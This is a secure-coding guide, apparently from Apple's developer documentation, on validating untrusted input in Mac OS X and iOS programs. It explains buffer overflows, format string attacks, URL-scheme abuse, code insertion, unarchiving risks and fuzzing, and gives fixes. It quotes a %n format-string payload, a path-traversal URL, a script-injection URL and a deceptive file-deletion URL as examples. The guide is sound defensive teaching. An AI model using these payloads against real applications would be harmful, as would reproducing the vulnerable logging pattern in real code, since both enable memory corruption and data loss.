
Validating Input

A major, and growing, source of security vulnerabilities is the failure of programs to validate all input from outside the program—that is, data provided by users or by other processes. This article describes some of the ways in which unvalidated input can be exploited, and some coding techniques to practice and to avoid.

Contents:

Risks of Unvalidated Input
Archived Data
Fuzzing


Risks of Unvalidated Input

Any time your program accepts input from an uncontrolled source, there is a potential for a user to pass in data that does not conform to your expectations. If you don’t validate the input, it might cause problems ranging from program crashes to allowing an attacker to execute his own code. There are a number of ways an attacker can take advantage of unvalidated input, described in the sections that follow.

Many Apple security updates have been issued to fix input vulnerabilities, including a couple of vulnerabilities that hackers used to “jailbreak” iPhones. Input vulnerabilities are common, often easy to exploit, and usually easy to remedy.

Causing a Buffer Overflow

If a user can input data and you don’t check its size and truncate it appropriately, an attacker can use the input field to cause a buffer overflow. For example, if you ask a user to input the name of an existing file, you might reserve a buffer of 256 bytes for the filename, with the expectation that no filename will be longer than that. However, if you don’t check the length of the string the user actually passes to you, some hacker is sure to try a longer string. Once attackers have established that they can cause a buffer overflow, they will attempt to craft an input for the field that results in an exploit of some sort (see “Avoiding Buffer Overflows”). Simply using the wrong string function to handle an input string can have the same result (see “String Handling”).
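The length check described above can be sketched as a small helper. This is a minimal illustration, not production code; the copy_filename name and the reject-rather-than-truncate policy are choices made for this example:

```c
#include <string.h>

/* Hypothetical helper: copy an untrusted filename into a fixed-size
   buffer. Returns 0 on success, or -1 if the input is too long to fit.
   Rejecting over-long input outright is often safer than silently
   truncating it, because a truncated name may refer to the wrong file. */
int copy_filename(char *dst, size_t dstlen, const char *src)
{
    size_t srclen = strlen(src);
    if (srclen >= dstlen)          /* no room for the string plus its NUL */
        return -1;
    memcpy(dst, src, srclen + 1);  /* the +1 copies the terminating NUL */
    return 0;
}
```

Calling copy_filename(buf, sizeof(buf), userInput) either copies the whole name or fails cleanly; it can never write past the end of buf.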

Format String Attacks

If you are taking input from a user or other untrusted source and displaying it, you need to be careful that your display routines do not process format strings received from the untrusted source. For example, in the following code the syslog standard C library function is used to write a received HTTP request to the system log. Because the syslog function processes format strings, it will process any format strings included in the input packet:

/* receiving http packet */
int size = recv(fd, pktBuf, sizeof(pktBuf) - 1, 0);
if (size > 0) {
    pktBuf[size] = '\0';
    syslog(LOG_INFO, "Received new HTTP request!");
    syslog(LOG_INFO, pktBuf);    /* DANGEROUS: pktBuf is used as a format string */
}

Many format strings can cause problems for applications. For example, suppose an attacker passes the following string in the input packet:

"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n"

Assuming that the format string itself is stored on the stack, this string retrieves eight items from the stack. Depending on the layout of the stack and memory used by the device, this might effectively move the print function’s internal argument pointer back to the beginning of the format string. Then the %n token could cause the print function to write the number of bytes formatted so far to the memory location AAAA, or 0x41414141. That in itself will cause a crash the next time the system has to access that memory location. By using a string carefully crafted for a specific device and operating system, the attacker can write arbitrary data to any location. See the manual page for printf(3) for a full description of format string syntax.

To prevent format string attacks, it is only necessary to make sure that no print function call that accepts input from an untrusted source processes format strings in the input data. To do so, you need to include your own format string in each such function call. For example, the call

printf(buffer)

may be subject to attack, but the call

printf("%s", buffer)

is not. In the second case, all characters in the buffer parameter—including percent signs (%)—are printed out rather than being interpreted as formatting tokens.
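This behavior can be demonstrated with a small, self-contained sketch; the render_untrusted helper name is hypothetical. Because the format string is the constant "%s", percent sequences in the untrusted input are copied through literally instead of being interpreted:

```c
#include <stdio.h>

/* Sketch: render an untrusted string for logging or display.
   The constant "%s" format guarantees that any % sequences in the
   input (such as %08x or %n) are treated as ordinary characters. */
int render_untrusted(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "%s", untrusted);
}
```

Passing the attack string from the earlier example through render_untrusted simply reproduces it verbatim; no stack items are read and no memory is written.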

This situation can be made more complicated when a string is accidentally formatted more than once. In the following example, the informativeTextWithFormat argument of the NSAlert method alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat: takes the result of a call to the NSString method stringWithFormat: rather than simply formatting the message string itself. As a result, the string is formatted twice, and the data from the imported certificate is used as part of the format string for the NSAlert method:

alert = [NSAlert alertWithMessageText:@"Certificate Import Succeeded"
                        defaultButton:@"OK"
                      alternateButton:nil
                          otherButton:nil
            informativeTextWithFormat:[NSString stringWithFormat:
       @"The imported certificate \"%@\" has been selected in the certificate pop-up.",
       [selectedCert identifier]]];
 
[alert setAlertStyle:NSInformationalAlertStyle];
[alert runModal];

Instead, the string should be formatted only once, as follows:

informativeTextWithFormat:@"The imported certificate \"%@\" has been selected in the certificate pop-up.",
       [selectedCert identifier]];

Commonly used functions and methods that are subject to format-string attacks include the standard C printf family (printf, fprintf, sprintf, snprintf, and their v-prefixed variants) and syslog; the Core Foundation functions CFStringCreateWithFormat and CFStringAppendFormat; and, in Cocoa, NSLog and methods that take format strings, such as stringWithFormat:, initWithFormat:, appendFormat:, and predicateWithFormat:.

URL Commands

If your application has registered a URL scheme, you have to be careful about how you process commands sent to your application through the URL string. Whether or not you make the commands public, hackers will try sending commands to your application. If, for example, you provide a link or links to launch your application from your web site, hackers will look to see what commands you’re sending and will try every variation on those commands they can think of. You must be prepared to handle, or to filter out, any commands that can be sent to your application, not only those commands that you would like to receive. For example, if you accept a command that causes your application to send credentials back to your web server, don’t make the function handler general enough that an attacker can substitute the URL of their own web server. In general, don’t accept commands that include arbitrary URLs or complete pathnames.

If you accept text or other data in a URL command that you subsequently include in a function or method call, you could be subject to a format string attack (see “Format String Attacks”) or a buffer overflow attack (see “Causing a Buffer Overflow”). If you accept pathnames, be careful to guard against strings that might redirect a call to another directory; for example:

myapp://use_template?template=/../../../../../../../../some/other/file
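A first line of defense against this kind of directory traversal is to refuse any suspicious path outright. The sketch below is a minimal illustration (the template_path_is_safe name is hypothetical); a production check should also canonicalize the path, for example with realpath, and verify that the result stays under a known directory prefix:

```c
#include <string.h>

/* Sketch: reject template pathnames that could escape the expected
   directory. Refuses absolute paths and any path containing "..".
   Returns 1 if the path looks safe, 0 otherwise. */
int template_path_is_safe(const char *path)
{
    if (path == NULL || path[0] == '\0')
        return 0;
    if (path[0] == '/')                  /* no absolute paths */
        return 0;
    if (strstr(path, "..") != NULL)      /* no parent-directory traversal */
        return 0;
    return 1;
}
```

With this check in place, the template parameter from the example URL above would be rejected before any file access occurs.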

Code Insertion

Unvalidated URL commands and text strings sometimes allow an attacker to insert code into a program, which the program then executes. For example, if your application processes HTML and JavaScript when displaying text, and displays strings received through a URL command, an attacker could send a command something like this:

myapp://cmd/adduser='>"><script>javascript to run goes here</script>

Similarly, HTML and other scripting languages can be inserted through URLs, text fields, and other data inputs, such as command lines and even graphics or audio files. You should either not execute scripts in data from an untrusted source, or you should validate all such data to make sure it conforms to your expectations for input. Never assume that the data you receive is well formed and valid; hackers and malicious users will try every sort of malformed data they can think of to see what effect it has on your program.
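When untrusted text must be displayed in an HTML context, one common validation step is to escape the characters that HTML treats specially, so injected markup renders as literal text instead of executing. The following is a minimal sketch (the html_escape helper name is hypothetical):

```c
#include <string.h>

/* Sketch: HTML-escape untrusted text before displaying it, so an
   injected <script> tag becomes literal text rather than running code.
   Writes at most outlen-1 bytes plus a terminating NUL.
   Returns 0 on success, -1 if the output buffer is too small. */
int html_escape(char *out, size_t outlen, const char *in)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (o + n >= outlen)       /* leave room for the NUL */
            return -1;
        memcpy(out + o, rep, n);
        o += n;
    }
    out[o] = '\0';
    return 0;
}
```

Escaping is only appropriate when the untrusted text is destined for HTML output; for other contexts (shell commands, SQL, file paths), each context needs its own validation.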

Social Engineering

Social engineering—essentially tricking the user—can be used with unvalidated input vulnerabilities to turn a minor annoyance into a major problem. For example, if your program accepts a URL command to delete a file, but first displays a dialog requesting permission from the user, an attacker might be able to send a long-enough string to scroll the name of the file to be deleted past the end of the dialog, tricking the user into thinking he is deleting something innocuous, such as unneeded cached data. For example:

myapp://cmd/delete?file=cached data that is slowing down your system.,realfile

The user then might see a dialog with the text “Are you sure you want to delete cached data that is slowing down your system.” The name of the real file, in this scenario, is out of sight below the bottom of the dialog window. When the user clicks the “OK” button, however, the user’s real data is deleted.

Other examples of social engineering attacks include tricking a user into clicking on a link in a malicious web site or following a malicious URL.

Archived Data

Archiving data refers to converting objects and values into an architecture-independent stream of bytes that preserves the identity of and the relationships between the objects and values. Archives are used for writing data to a file, transmitting data between processes or across a network, or performing other types of data storage or exchange. Archiving is described briefly in this section in order to explain the security concerns associated with the process of reading archived data. For details about archiving, see Archives and Serializations Programming Guide for Cocoa.

Archiving and Unarchiving Data In Mac OS X

In Cocoa, you use a coder object to create and read from an archive, where a coder object is an instance of a concrete subclass of the abstract class NSCoder. NSCoder declares an extensive interface for taking the information stored in an object and putting it into a format suitable for archiving. NSCoder also declares the interface for reversing the process, taking the information stored in a byte stream and converting it back into an object.

Mac OS X provides several concrete subclasses of NSCoder for developers’ use. Most commonly used are NSKeyedArchiver and NSKeyedUnarchiver. The easiest way to use these classes is to call a convenience class method that instantiates the class and initializes the coder object for you, such as archivedDataWithRootObject: or unarchiveObjectWithData:. The coder then sends an encodeWithCoder: message to your object if it’s creating an archive or an initWithCoder: message if it’s reading an archive. You are responsible for implementing these methods—which do the actual encoding or decoding of your object’s instance variables—for each object that supports archiving. The NSKeyedArchiver and NSKeyedUnarchiver classes implement methods that your encodeWithCoder: and initWithCoder: methods can call to code or decode values.

For example, suppose you have a data object called myData and you want to archive the data in that object. Your myData object would have to implement the encodeWithCoder: method to encode the instance variables in the myData object. A typical execution sequence would proceed like this:

  1. Your application calls the archivedDataWithRootObject: method, passing it a pointer to your myData object.

  2. The archivedDataWithRootObject: method instantiates and initializes an NSKeyedArchiver object, which sends an encodeWithCoder: message to your myData object. The encodeWithCoder: message includes a pointer to the NSKeyedArchiver object that sent the message.

  3. Your myData object executes its encodeWithCoder: method.

  4. The encodeWithCoder: method encodes the instance variables of your myData object by calling methods provided by the NSKeyedArchiver object—for example, encodeObject:forKey: or encodeFloat:forKey:.

  5. When your encodeWithCoder: method is finished encoding your object’s data, it returns control to the archivedDataWithRootObject: method.

  6. The archivedDataWithRootObject: method completes, returning to your application a pointer to the archived data.

To unarchive the data, your application follows essentially the same steps, except that you call the unarchiveObjectWithData: method, which calls your data object’s initWithCoder: method. For code samples illustrating these steps, see Archives and Serializations Programming Guide for Cocoa and the iSpend sample application.

The Security Risks In Unarchiving Data

Archived data can be stored in memory or in a file on disk. Because an application must know the type of data stored in an archive in order to unarchive it, developers typically assume that the values being decoded are the same size and data type as the values they originally coded. However, when the data is stored in an insecure manner before being unarchived, this is not a safe assumption. If the archived data is not stored securely, it is possible for an attacker to modify the data before the application unarchives it. If your initWithCoder: method does not carefully validate all the data it’s decoding to make sure it is well formed and does not exceed the memory space reserved for it, then by carefully crafting a corrupted archive, an attacker can cause a buffer overflow or trigger another vulnerability and possibly seize control of the system.

In addition, some objects return a different object during unarchiving (see the NSKeyedUnarchiver delegate method unarchiver:didDecodeObject:) or when they receive the message awakeAfterUsingCoder:. NSImage is one example of such a class—it may register itself for a name when unarchived, potentially taking the place of an image the application uses. An attacker might be able to take advantage of this to insert a maliciously corrupt image file into an application.

It’s worth keeping in mind that, even if you write completely safe code, there might still be security vulnerabilities in libraries called by your code. Specifically, the initWithCoder: methods of the superclasses of your classes are also involved in unarchiving. Therefore, to be completely sure of the safety of unarchived data, you should be careful to store the data in a secure location.

Note that nib files are archives, and these cautions apply equally to them. A nib file loaded from a signed application bundle should be trustable, but a nib file stored in an insecure location is not.

See “Risks of Unvalidated Input” for more information on the risks of reading unvalidated input, “Secure File Operations” for techniques you can use to keep your archive files secure, and the other sections in this chapter for details on validating input.

Fuzzing

Fuzzing, or fuzz testing, is the technique of passing random data to a program input to see what happens. If the program crashes or otherwise misbehaves, that’s an indication of a potential vulnerability that might be exploitable. Fuzzing is a favorite tool of hackers who are looking for buffer overflows and the other types of vulnerabilities discussed in this article. Because it will be employed by hackers against your program, you should use it first, so you can close any vulnerabilities before they do. Although you can never prove that your program is completely free of vulnerabilities, you can at least get rid of any that are easy to find this way.

In this case, the developer’s job is much easier than that of the hacker. Whereas the hacker must not only find input fields that might be vulnerable, but also determine the exact nature of the vulnerability and then craft an attack that exploits it, you need only find the vulnerability, then look at the source code to determine how to close it. You don’t need to prove that the problem is exploitable—just assume that someone will find a way to exploit it, and fix it before they get an opportunity to try.

Fuzzing is best done with scripts or short programs that randomly vary the input passed to a program. Depending on the type of input you’re testing—text field, URL, data file, and so forth—you can try HTML, JavaScript, extra-long strings, normally illegal characters, and so forth. If the program crashes or does anything unexpected, you need to examine the source code that handles that input to see what the problem is, and fix it.
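A fuzzing loop can be as simple as the following sketch. The parse_header function here is a hypothetical stand-in for whatever input handler you are testing; the loop feeds it random byte strings and checks an invariant after every call:

```c
#include <stdlib.h>
#include <string.h>

/* Toy parser standing in for real input-handling code:
   returns the index of the first ':' in the buffer, or -1. */
static int parse_header(const char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == ':')
            return (int)i;
    return -1;
}

/* Minimal fuzzing sketch: hammer parse_header with random byte
   strings of random lengths. Returns the number of iterations that
   completed, stopping early if the result invariant is violated. */
int fuzz_parse_header(unsigned seed, int iterations)
{
    char buf[64];
    srand(seed);
    for (int i = 0; i < iterations; i++) {
        size_t len = (size_t)(rand() % (int)sizeof(buf));
        for (size_t j = 0; j < len; j++)
            buf[j] = (char)(rand() % 256);  /* include illegal bytes */
        int r = parse_header(buf, len);
        if (r < -1 || r >= (int)len)        /* result must be -1 or a valid index */
            return i;
    }
    return iterations;
}
```

A real fuzzer would also vary lengths past the buffer sizes the code expects, inject format tokens and script fragments, and run the target under a memory-error detector so that corruption is caught immediately rather than by a later crash.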





© 2008 Apple Inc. All Rights Reserved. (Last updated: 2008-05-23)

